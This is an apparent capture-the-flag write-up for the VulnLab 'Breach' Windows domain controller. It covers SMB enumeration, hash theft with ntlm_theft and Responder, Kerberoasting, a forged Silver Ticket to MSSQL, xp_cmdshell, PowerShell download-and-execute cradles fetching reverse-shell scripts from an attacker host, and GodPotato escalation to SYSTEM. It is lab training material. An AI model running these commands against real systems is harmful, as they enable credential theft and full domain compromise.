VL-Breach

Initial Enumeration

NMAP Scan Results

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-17 15:22:18Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.109.252:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
| smb2-time: 
|   date: 2025-03-17T15:22:26
|_  start_date: N/A
|_clock-skew: mean: -1h59m59s, deviation: 0s, median: -1h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

User Access

Enumerating Shares

First, let’s check for available SMB shares using the guest account:

netexec smb 10.10.109.252 -u 'guest' -p '' --shares

Next, let’s connect to the “share” using the guest account:

smbclient //10.10.109.252/share -U 'guest'

We found several potential users:

claire.pope
diana.pope
julia.wong

NTLM Hash Capture

We used ntlm_theft (https://github.com/Greenwolf/ntlm_theft) to create files that, when accessed, would send us the NTLM hash of the user who opened them:

python3 ntlm_theft.py -g all -s <your ip> -f invoice

After creating these files, we connected to the SMB share and uploaded them to all accessible folders:

smbclient //10.10.126.89/share -U 'guest'

mput *

Then we started Responder to capture any callbacks:

sudo responder -I tun0 -dwv

We saved the hash and cracked it using hashcat:

hashcat hash55.txt /usr/share/wordlists/rockyou.txt

Accessing Julia Wong’s Files

Now that we have Julia Wong’s credentials, we logged back into the share:

smbclient //10.10.126.89/share -U 'julia.wong'

This is where we found the user flag.

Privilege Escalation

BloodHound Enumeration

To get a better understanding of the Active Directory environment, we used BloodHound:

netexec ldap 10.10.126.89 -u 'julia.wong' -p 'Computer1'  --bloodhound --dns-server 10.10.126.89 -c All --dns-tcp

Inside BloodHound, we identified a kerberoastable service named SVC_MSSQL@BREACH.VL. We decided to target this service for our lateral movement.

Kerberoasting

We attempted to obtain the service hash:

impacket-GetUserSPNs -dc-ip 10.10.126.89 -request breach.vl/julia.wong:'<PASSWORD>'

Initially, we encountered a clock skew error: KRB_AP_ERR_SKEW(Clock skew too great). To fix this, we synchronized our time with the target system:

sudo timedatectl set-ntp off

sudo rdate -n [IP of Target]

Then we ran GetUserSPNs again:

We cracked the hash using hashcat:

hashcat hash56.txt /usr/share/wordlists/rockyou.txt

This gave us the password for the MSSQL service account.

MSSQL Access

We connected to the MSSQL server using the service account:

impacket-mssqlclient svc_mssql:Trustno1@10.10.126.89

We attempted to enable command execution but encountered permission issues:

ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Silver Ticket Attack

Since we couldn’t execute commands directly, we decided to create a Silver Ticket:

1. First, we converted the service account password to an NT hash using an online tool: https://www.browserling.com/tools/ntlm-hash

2. Next, we needed the domain SID:

   lookupsid.py 'breach.vl/svc_mssql@10.10.126.89' 0

   Domain SID is: S-1-5-21-2330692793-3312915120-706255856

3. We created the Silver Ticket using ticketer:

   impacket-ticketer -nthash <> -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator

   export KRB5CCNAME=administrator.ccache

4. We used the Silver Ticket to connect to MSSQL as administrator:

   impacket-mssqlclient -k breachdc.breach.vl

   enable_xp_cmdshell

Getting a Reverse Shell

Our initial attempt to get a reverse shell was flagged as malicious:

EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/Invoke-ConPtyShell.ps1''); Invoke-ConPtyShell 10.8.5.195 3001"';

We found an alternative payload that worked:

EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/maybe.ps1'')"';

Privilege Escalation to SYSTEM

Since we had impersonation privileges, we used GodPotato to escalate to SYSTEM: https://github.com/BeichenDream/GodPotato/releases/tag/V1.20

./God.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command  IEX (New-Object Net.WebClient).DownloadString('http://10.8.5.195:8080/maybe.ps1')"

We modified our maybe.ps1 script and set up a listener:

nc -lvnp 4444

https://api.vulnlab.com/api/v1/share?id=c3140301-21e1-4913-99b2-b635726c0e21